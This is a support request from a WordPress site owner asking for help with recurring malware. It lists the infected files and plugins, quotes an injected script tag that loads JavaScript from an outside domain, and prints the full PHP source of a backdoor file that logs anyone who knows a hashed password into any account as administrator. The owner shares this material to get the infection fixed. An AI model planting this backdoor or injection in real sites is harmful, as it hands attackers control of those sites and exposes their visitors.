Request for Support – WordPress Malware Issue

Dear Wordfence Support Team,

I am reaching out to seek assistance with a malware issue on my WordPress website. I have been experiencing recurring malware injections, and despite my efforts, I have been unable to completely resolve the issue.

Description of the malware issue:

• Malicious files: wp-links.php, sw.js, font.js, index.php, google.json
• File locations:
  • wp-links.php found in the root directory, and occasionally in public_html/wp-includes
  • Additional files in the wp-content folder: index.php and google.json
  • Presence of these malicious files in wp-includes/theme folder and plugin folders as well
• Code injection: The malware injects a script into the theme’s header.php file with the following content: <script>var pm_tag = ‘a4s’;var pm_pid = “23751-1824878d”;</script><script src=”//xm.xms.lol/js/pub.min.js” async></script>
• Other affected files: There are additional PHP files that I have been unable to locate.
• Malware detection: When Googling the issue, it shows the reason as SMW-INJ-21631-php.tool.obf.remote-0.

Files in the plugin folders affected by malware:

• public_html/wp-content/plugins/google-site-kit/google-site-kit.php
• public_html/wp-content/plugins/pixwell-deal/pixwell-deal.php
• public_html/wp-content/plugins/elementor/elementor.php
• public_html/wp-content/plugins/envato-market/envato-market.php
• public_html/wp-content/plugins/pixwell-core/pixwell-core.php

Code snippet from wp-links.php file:

<?php
if ( ! defined( 'DIZIN' ) ) {
define( 'DIZIN', dirname( FILE ) . '/' );
}
require_once( DIZIN ."wp-load.php");

$pass = md5(md5(md5($_GET['sifre'])));
$password = "74de57650aab7115e3c3c1e0507082f6";
$user_id = $_GET['userid'];

if($pass==$password){
require_once( DIZIN . 'wp-includes/pluggable.php');
$user_info = get_userdata($user_id);
$username = $user_info->user_login;
$user = get_user_by('login', $username );

if ( !is_wp_error( $user ) )
{
wp_clear_auth_cookie();
wp_set_current_user ( $user->ID );
wp_set_auth_cookie ( $user->ID );

$redirect_to = user_admin_url();
wp_safe_redirect( $redirect_to );

exit();

}

}

Steps I have taken so far:

1. Scanned my website using a security plugin, but the malware continues to reappear.
2. Removed wp-links.php, sw.js, index.php, google.json, and the affected plugin files manually from the respective directories.
3. Checked theme files for suspicious code and removed any identified malicious snippets.
4. Updated WordPress, themes, and plugins to their latest versions.
5. Changed all passwords related to my website, including admin, FTP, and database.

Despite these efforts, the malware keeps reappearing, and I’m unable to find the source of the infection. I would greatly appreciate your assistance in identifying and resolving the issue permanently.

Please let me know if there are any additional steps I can take or if you require any further information to assist me with this matter. Thank you for your time and support.

Sincerely,
Helani

The page I need help with: [log in to see the link]